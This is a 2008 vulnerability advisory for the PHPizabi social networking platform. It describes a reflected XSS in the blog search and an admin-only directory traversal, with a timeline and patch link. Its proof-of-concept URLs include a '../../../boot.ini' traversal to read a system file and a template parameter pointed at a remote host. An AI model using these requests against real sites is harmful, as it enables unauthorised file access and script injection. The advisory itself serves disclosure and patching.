phpizabi-traverse.txt

`##########################################  
PHPizabi v0.848b traversal file access  
Vendor url:http://www.phpizabi.net/  
Advisore:http://lostmon.blogspot.com/2008/08/  
phpizabi-v0848b-traversal-file-access.html  
Vendor notify:no exploit available:yes  
##########################################  
  
############################  
Description By vendor page:  
############################  
  
PHPizabi is one of the most powerful social networking  
platforms on the planet. With literally thousands of  
websites powered by PHPizabi including everything from  
simple friends sites to the most complex networking  
super sites out there. Easy to install, use, and raising  
the bar on what it is to provide a reliable, fast, social  
networking package to raise your business to the next level.  
  
##########################  
Vulnerability description  
##########################  
PHPizabi contains a flaw that allows a remote traversal  
arbitrary folder enumeration.This flaw exists because the  
application does not validate 'query' variable upon submission  
to 'index.php' scripts wen 'L' param is set to 'blogs.search'.  
This could allow a remote users to create a specially crafted  
URL that would execute '../' directory traversal characters to  
view folder files on the target system with the privileges  
of the target web service.  
  
  
#################  
Versions  
################·  
  
PHPizabi v0.848b C1 HFP3  
  
  
###################  
Solution  
###################  
  
At this moment ,no have solution for Traversal vuln.  
  
For solve XSS issue in search blogs update to sp3  
of this system:  
  
Download sp3:  
http://online.phpizabi.net/distribution/0848bC1_HFP3.zip  
  
  
###################  
Timeline  
##################  
  
Dicovered:10-08-2008  
vendor notify: 14-08-2008  
Vendor response:  
Public Disclosure:15-08-2008  
  
###################  
Proof of Concept.  
###################  
  
#############  
XSS  
#############  
  
if the sito don´t have instaled 848 Core HotFix Pack 3  
(0848bC1_HFP3.zip) this system have one XSS hole in query  
variable upon submision to index.php script wen L param is  
set to blogs.search:  
  
http://localhost/phpizabi/index.php?L=blogs.search&query=  
[XSS-CODE]boolean=or&sin%5B%5D=title&sin  
%5B%5D=body&order=natural&direction=asc  
  
  
#####################  
Traversal file access  
#####################  
  
For exploit this issue The attacker  
need a Admin account.  
  
http://localhost/phpizabi/index.php?L=  
admin.templates.edittemplate&id=../../../boot.ini  
  
we can too 'view' the html source code generated by  
a remote server like :  
  
http://localhost/phpizabi/index.php?  
L=admin.templates.edittemplate  
&id=http://[Remote-HOST]/folder/file.php  
  
but i don't know if with this we can do something...  
  
  
############## €nd ###################  
  
Thnx To estrella to be my light  
Thnx to all Lostmon Team !  
thnx to imydes From www.imydes.com  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`